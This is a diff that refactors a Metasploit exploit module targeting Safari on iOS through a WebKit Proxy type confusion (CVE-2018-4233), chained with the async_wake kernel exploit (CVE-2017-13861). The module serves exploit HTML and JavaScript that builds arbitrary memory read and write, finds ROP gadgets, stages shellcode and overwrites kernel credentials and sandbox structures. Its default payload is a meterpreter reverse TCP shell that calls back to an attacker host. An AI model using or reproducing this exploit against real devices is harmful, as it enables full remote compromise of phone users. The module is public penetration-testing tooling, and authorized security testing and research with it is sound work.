@@ -11,38 +11,40 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Safari Webkit Proxy Object Type Confusion',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Safari Webkit Proxy Object Type Confusion',
+        'Description' => %q{
           This module exploits a type confusion bug in the Javascript Proxy object in
-        WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
-        it is possible to run arbitrary JS code during the execution of a CreateThis
-        operation. This makes it possible to change the structure of e.g. an argument
-        without causing a bailout, leading to a type confusion (CVE-2018-4233).
+          WebKit. The DFG JIT does not take into account that, through the use of a Proxy,
+          it is possible to run arbitrary JS code during the execution of a CreateThis
+          operation. This makes it possible to change the structure of e.g. an argument
+          without causing a bailout, leading to a type confusion (CVE-2018-4233).
 
           The type confusion leads to the ability to allocate fake Javascript objects,
-        as well as the ability to find the address in memory of a Javascript object.
-        This allows us to construct a fake JSCell object that can be used to read
-        and write arbitrary memory from Javascript.  The module then uses a ROP chain
-        to write the first stage shellcode into executable memory within the Safari
-        process and kick off its execution.
+          as well as the ability to find the address in memory of a Javascript object.
+          This allows us to construct a fake JSCell object that can be used to read
+          and write arbitrary memory from Javascript.  The module then uses a ROP chain
+          to write the first stage shellcode into executable memory within the Safari
+          process and kick off its execution.
 
           The first stage maps the second stage macho (containing CVE-2017-13861) into
-        executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake
-        exploit leads to a kernel task port (TFP0) that can read and write arbitrary
-        kernel memory. The processes credential and sandbox structure in the kernel
-        is overwritten and the meterpreter payloads code signature hash is added to
-        the kernels trust cache, allowing Safari to load and execute the (self-signed)
-        meterpreter payload.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         => [
-        'saelo',
-        'niklasb',
-        'Ian Beer',
-        'siguza',
+          executable memory, and jumps to its entrypoint. The CVE-2017-13861 async_wake
+          exploit leads to a kernel task port (TFP0) that can read and write arbitrary
+          kernel memory. The processes credential and sandbox structure in the kernel
+          is overwritten and the meterpreter payloads code signature hash is added to
+          the kernels trust cache, allowing Safari to load and execute the (self-signed)
+          meterpreter payload.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'saelo',
+          'niklasb',
+          'Ian Beer',
+          'siguza',
         ],
-      'References'     => [
+        'References' => [
           ['CVE', '2018-4233'],
           ['CVE', '2017-13861'],
           ['URL', 'https://github.com/saelo/cve-2018-4233'],
@@ -50,63 +52,40 @@ class MetasploitModule < Msf::Exploit::Remote
           ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1417'],
           ['URL', 'https://github.com/JakeBlair420/totally-not-spyware/blob/master/root/js/spyware.js'],
         ],
-      'Arch'           => ARCH_AARCH64,
-      'Platform'       => 'apple_ios',
-      'DefaultTarget'  => 0,
-      'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
-      'Targets'        => [[ 'Automatic', {} ]],
-      'DisclosureDate' => '2018-03-15'))
+        'Arch' => ARCH_AARCH64,
+        'Platform' => 'apple_ios',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => { 'PAYLOAD' => 'apple_ios/aarch64/meterpreter_reverse_tcp' },
+        'Targets' => [[ 'Automatic', {} ]],
+        'DisclosureDate' => '2018-03-15',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ IOC_IN_LOGS ],
+          'Reliability' => [ UNRELIABLE_SESSION ]
+        }
+      )
+    )
     register_advanced_options([
-      OptBool.new('DEBUG_EXPLOIT', [false, "Show debug information in the exploit javascript", false]),
-      OptBool.new('DUMP_OFFSETS', [false, "Show newly found offsets in a javascript prompt", false]),
+      OptBool.new('DEBUG_EXPLOIT', [false, 'Show debug information in the exploit JavaScript', false]),
+      OptBool.new('DUMP_OFFSETS', [false, 'Show newly found offsets in a JavaScript prompt', false]),
     ])
   end
 
   def payload_url
-    "tcp://#{datastore["LHOST"]}:#{datastore["LPORT"]}"
+    "tcp://#{datastore['LHOST']}:#{datastore['LPORT']}"
   end
 
   def get_version(user_agent)
     if user_agent =~ /OS (.*?) like Mac OS X\)/
-      ios_version = Rex::Version.new($1.gsub("_", "."))
+      ios_version = Rex::Version.new(::Regexp.last_match(1).gsub('_', '.'))
       return ios_version
     end
-    fail_with Failure::NotVulnerable, 'Target is not vulnerable'
+
+    fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
   end
 
-  def on_request_uri(cli, request)
-    if request.uri =~ %r{/apple-touch-icon*}
-      return
-    elsif request.uri =~ %r{/favicon*}
-      return
-    elsif request.uri =~ %r{/payload10$*}
-      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1
-      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
-      print_good("Sent sha1 iOS 10 payload")
-      return
-    elsif request.uri =~ %r{/payload11$*}
-      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib
-      send_response(cli, payload_data, {'Content-Type'=>'application/octet-stream'})
-      print_good("Sent sha256 iOS 11 payload")
-      return
-    end
-
-    user_agent = request['User-Agent']
-    print_status("Requesting #{request.uri} from #{user_agent}")
-    version = get_version(user_agent)
-    ios_11 = (version >= Rex::Version.new('11.0.0'))
-    if request.uri =~ %r{/exploit$}
-      loader_data = exploit_data('CVE-2017-13861', 'exploit')
-      srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)
-      config = [srvhost, srvport].pack("Nn") + payload_url
-      payload_url_index = loader_data.index('PAYLOAD_URL')
-      loader_data[payload_url_index, config.length] = config
-      print_good("Sent async_wake exploit")
-      send_response(cli, loader_data, {'Content-Type'=>'application/octet-stream'})
-      return
-    end
-
-    get_mem_rw_ios_10 = %Q^
+  def get_mem_rw_ios_10
+    %^
 function get_mem_rw(stage1) {
     var structs = [];
     function sprayStructures() {
@@ -163,8 +142,10 @@ function get_mem_rw(stage1) {
     return memory;
 }
 ^
+  end
 
-    get_mem_rw_ios_11 = %Q^
+  def get_mem_rw_ios_11
+    %^
 function get_mem_rw(stage1) {
     var FPO = typeof(SharedArrayBuffer) === 'undefined' ? 0x18 : 0x10;
     var structure_spray = []
@@ -298,13 +279,44 @@ function get_mem_rw(stage1) {
     return stage2;
 }
 ^
+  end
+
+  # rubocop:disable Metrics/MethodLength
+  def on_request_uri(cli, request)
+    return if request.uri =~ %r{/apple-touch-icon*}
+    return if request.uri =~ %r{/favicon*}
+
+    if request.uri =~ %r{/payload10$*}
+      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib_sha1
+      send_response(cli, payload_data, { 'Content-Type' => 'application/octet-stream' })
+      print_good('Sent sha1 iOS 10 payload')
+      return
+    end
+
+    if request.uri =~ %r{/payload11$*}
+      payload_data = MetasploitPayloads::Mettle.new('aarch64-iphone-darwin').to_binary :dylib
+      send_response(cli, payload_data, { 'Content-Type' => 'application/octet-stream' })
+      print_good('Sent sha256 iOS 11 payload')
+      return
+    end
+
+    user_agent = request['User-Agent']
+    print_status("Requesting #{request.uri} from #{user_agent}")
+
+    if request.uri =~ %r{/exploit$}
+      loader_data = exploit_data('CVE-2017-13861', 'exploit')
+      srvhost = Rex::Socket.resolv_nbo_i(srvhost_addr)
+      config = [srvhost, srvport].pack('Nn') + payload_url
+      payload_url_index = loader_data.index('PAYLOAD_URL')
+      loader_data[payload_url_index, config.length] = config
+      print_good('Sent async_wake exploit')
+      send_response(cli, loader_data, { 'Content-Type' => 'application/octet-stream' })
+      return
+    end
 
-    get_mem_rw = (version >= Rex::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10
-    utils = exploit_data "javascript_utils", "utils.js"
-    int64 = exploit_data "javascript_utils", "int64.js"
     dump_offsets = ''
     if datastore['DUMP_OFFSETS']
-      dump_offsets = %Q^
+      dump_offsets = %^
         var offsetstr = uuid + " : { ";
         var offsetarray = [ "_dlsym", "_dlopen", "__longjmp", "regloader", "dispatch", "stackloader", "movx4", "ldrx8", "_mach_task_self_", "__kernelrpc_mach_vm_protect_trap", "__platform_memmove",
         "__ZN3JSC30endOfFixedExecutableMemoryPoolE", "__ZN3JSC29jitWriteSeparateHeapsFunctionE", "__ZN3JSC32startOfFixedExecutableMemoryPoolE", ];
@@ -320,7 +332,15 @@ function get_mem_rw(stage1) {
 ^
     end
 
-    html = %Q^
+    version = get_version(user_agent)
+    ios_11 = (version >= Rex::Version.new('11.0.0'))
+
+    get_mem_rw = (version >= Rex::Version.new('11.2.2')) ? get_mem_rw_ios_11 : get_mem_rw_ios_10
+
+    utils = exploit_data('javascript_utils', 'utils.js')
+    int64 = exploit_data('javascript_utils', 'int64.js')
+
+    html = %^
 <html>
 <body>
 <script>
@@ -405,7 +425,7 @@ function pwn() {
     stage1.test();
 
     var stage2 = get_mem_rw(stage1);
-    var FPO = #{ios_11 ? "(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;" : "0x18;"}
+    var FPO = #{ios_11 ? "(typeof(SharedArrayBuffer) === 'undefined') ? 0x20 : 0x18;" : '0x18;'}
     var memory = stage2;
     memory.u32 = _u32;
 
@@ -493,17 +513,22 @@ function pwn() {
         var libs =
         {
             "/usr/lib/system/libdyld.dylib":                                        ["_dlsym", "_dlopen"],
-            #{ ios_11 ? '
+            #{ if ios_11
+                 '
             "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore":   ["__ZN3JSC29jitWriteSeparateHeapsFunctionE"],
             "/usr/lib/system/libsystem_platform.dylib":                             ["__longjmp"],
-            ' : '
+            '
+               else
+                 '
             "/usr/lib/system/libsystem_platform.dylib":                             ["__longjmp", "__platform_memmove"],
             "/usr/lib/system/libsystem_kernel.dylib":                               ["_mach_task_self_", "__kernelrpc_mach_vm_protect_trap"],
             "/System/Library/Frameworks/JavaScriptCore.framework/JavaScriptCore":   ["__ZN3JSC30endOfFixedExecutableMemoryPoolE"],
-            '}
+            '
+               end}
         }
 
-        #{ ios_11 ? '
+        #{ if ios_11
+             '
         var opcodes = {
             // ldr x8, [sp] ; str x8, [x19] ; ldp x29, x30, [sp, #0x20] ; ldp x20, x19, [sp, #0x10] ; add sp, sp, #0x30 ; ret
             "ldrx8":     [ [0xf94003e8, 0xf9000268, 0xa9427bfd, 0xa9414ff4, 0x9100c3ff, 0xd65f03c0] ],
@@ -522,7 +547,9 @@ function pwn() {
             "/usr/lib/libc++.1.dylib",  // ldrx8, regloader, movx4, stackloader
         ];
 
-        ' : '
+        '
+           else
+             '
         var opcodes = {
             // mov x0, x23; mov x1, x22; mov x2, x24; mov x3, x25; mov x4, x26; mov x5, x27; blr x28
             "regloader": [ [ 0xaa1703e0, 0xaa1603e1, 0xaa1803e2, 0xaa1903e3, 0xaa1a03e4, 0xaa1b03e5, 0xd63f0380 ] ],
@@ -543,7 +570,8 @@ function pwn() {
         };
 
         var opcode_libs = [ "/usr/lib/libLLVM.dylib" ];
-        '}
+        '
+           end}
 
         var imgs  = Add(hdr, memory.u32(Add(hdr, 0x18)));
         var nimgs = memory.u32(Add(hdr, 0x1c));
@@ -693,10 +721,12 @@ function pwn() {
         if (offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"] == null && offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"] != null) {
             offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"] = Sub(offsets["__ZN3JSC29jitWriteSeparateHeapsFunctionE"], 8);
         }
-        #{ ios_11 ? '
+        #{ if ios_11
+             '
         if (offsets["__ZN3JSC32startOfFixedExecutableMemoryPoolE"] == null && offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"] != null) {
             offsets["__ZN3JSC32startOfFixedExecutableMemoryPoolE"] = Sub(offsets["__ZN3JSC30endOfFixedExecutableMemoryPoolE"], 8);
-        }' : ''}
+        }'
+           end}
 
 #{dump_offsets}
 
@@ -943,7 +973,8 @@ function pwn() {
         )
     }
 
-    #{ios_11 ? '
+    #{if ios_11
+        '
     if (jitWriteSeparateHeaps.lo() || jitWriteSeparateHeaps.hi()) {
         add_call(jitWriteSeparateHeaps
             , Sub(codeAddr, memPoolStart)     // off
@@ -953,7 +984,9 @@ function pwn() {
     } else {
         fail("jitWrite");
     }
-    ' : '
+    '
+      else
+        '
     add_call(mach_vm_protect,
         mach_task_self_,    // task
         codeAddr,           // addr
@@ -967,7 +1000,8 @@ function pwn() {
         paddr,              // src
         shsz                // size
     );
-    '}
+    '
+      end}
 
     add_call(codeAddr,
         dlopen,
@@ -1023,11 +1057,13 @@ go();
 </body>
 </html>
     ^
+
     unless datastore['DEBUG_EXPLOIT']
-      html.gsub!(/\/\/.*$/, '') # strip comments
+      html.gsub!(%r{//.*$}, '') # strip comments
       html.gsub!(/^\s*print\s*\(.*?\);\s*$/, '') # strip print(*);
     end
-    send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'})
-  end
 
+    send_response(cli, html, { 'Content-Type' => 'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0' })
+  end
+  # rubocop:enable Metrics/MethodLength
 end
